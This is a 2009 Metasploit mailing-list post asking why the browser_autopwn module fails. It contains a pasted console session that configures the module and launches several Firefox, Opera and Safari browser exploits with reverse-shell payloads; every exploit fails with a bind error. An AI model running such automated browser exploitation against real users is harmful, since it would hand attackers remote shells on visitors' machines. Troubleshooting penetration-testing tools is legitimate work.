Metasploit mailing list archives
server/browser_autopwn error
From: go.hawaii () gmx de
Date: Fri, 13 Nov 2009 21:45:39 +0100
Hi, using server/browser_autopwn gives me the following errors: msf > use server/browser_autopwn msf auxiliary(browser_autopwn) > set LHOST 192.168.178.190 LHOST => 192.168.178.190 msf auxiliary(browser_autopwn) > set SRVHOST 192.168.178.190 SRVHOST => 192.168.178.190 msf auxiliary(browser_autopwn) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.178.190 yes The IP address to use for reverse-connect payloads SRVHOST 192.168.178.190 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) msf auxiliary(browser_autopwn) > exploit -j [*] Auxiliary module running as background job msf auxiliary(browser_autopwn) > [*] Starting exploit modules on host 192.168.178.190... [*] --- [*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp *[-] Exploit failed: Cannot assign requested address - bind(2)* [-] Failed to start exploit module multi/browser/firefox_escape_retval [*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp *[-] Exploit failed: Cannot assign requested address - bind(2)* [-] Failed to start exploit module multi/browser/mozilla_compareto [*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp *[-] Exploit failed: Cannot assign requested address - bind(2)* [-] Failed to start exploit module multi/browser/mozilla_navigatorjava [*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp *[-] Exploit failed: Cannot assign requested address - bind(2)* [-] Failed to start exploit module multi/browser/opera_configoverwrite [*] Starting exploit multi/browser/opera_historysearch with payload generic/shell_reverse_tcp *[-] Exploit failed: Cannot assign requested address - bind(2)* [-] Failed to start exploit module multi/browser/opera_historysearch [*] Starting exploit osx/browser/safari_metadata_archive with payload generic/shell_reverse_tcp *[-] Exploit failed: Cannot assign requested address - bind(2)* Interrupt: use the 'exit' command to quit Has anybody an idea?? Here is the netstat output before "exploit -j": Honolulu ~ # netstat -tanp Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.1:5432 0.0.0.0:* LISTEN 5756/postgres and after: Honolulu ~ # netstat -tanp Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:3333 0.0.0.0:* LISTEN 8863/ruby tcp 0 0 0.0.0.0:6666 0.0.0.0:* LISTEN 8863/ruby tcp 0 0 127.0.0.1:5432 0.0.0.0:* LISTEN 5756/postgres and the msf version: msf > version Framework: 3.3-rc1.7416 Console : 3.3-rc1.7450 Thanks for your help. Cheers, Nick
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- server/browser_autopwn error go . hawaii (Nov 13)